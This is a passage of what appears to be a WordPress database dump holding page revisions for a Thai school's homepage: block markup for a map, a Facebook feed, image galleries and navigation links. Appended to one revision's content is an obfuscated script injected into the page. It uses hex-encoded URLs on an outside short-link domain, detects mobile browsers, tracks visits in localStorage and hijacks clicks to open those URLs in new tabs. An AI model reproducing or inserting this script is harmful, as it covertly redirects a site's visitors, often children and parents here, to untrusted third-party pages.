/wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:44:08','2025-09-11 07:44:08','',14,'http://pakhaeng.ssk.in.th/?p=2044',0,'revision','',0),
(2045,1,'2025-09-11 14:44:58','2025-09-11 07:44:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"fluidcarousel\",\"imageRatio\":\"inherit\",\"carouselHeight\":[400,\"\",\"\"],\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- 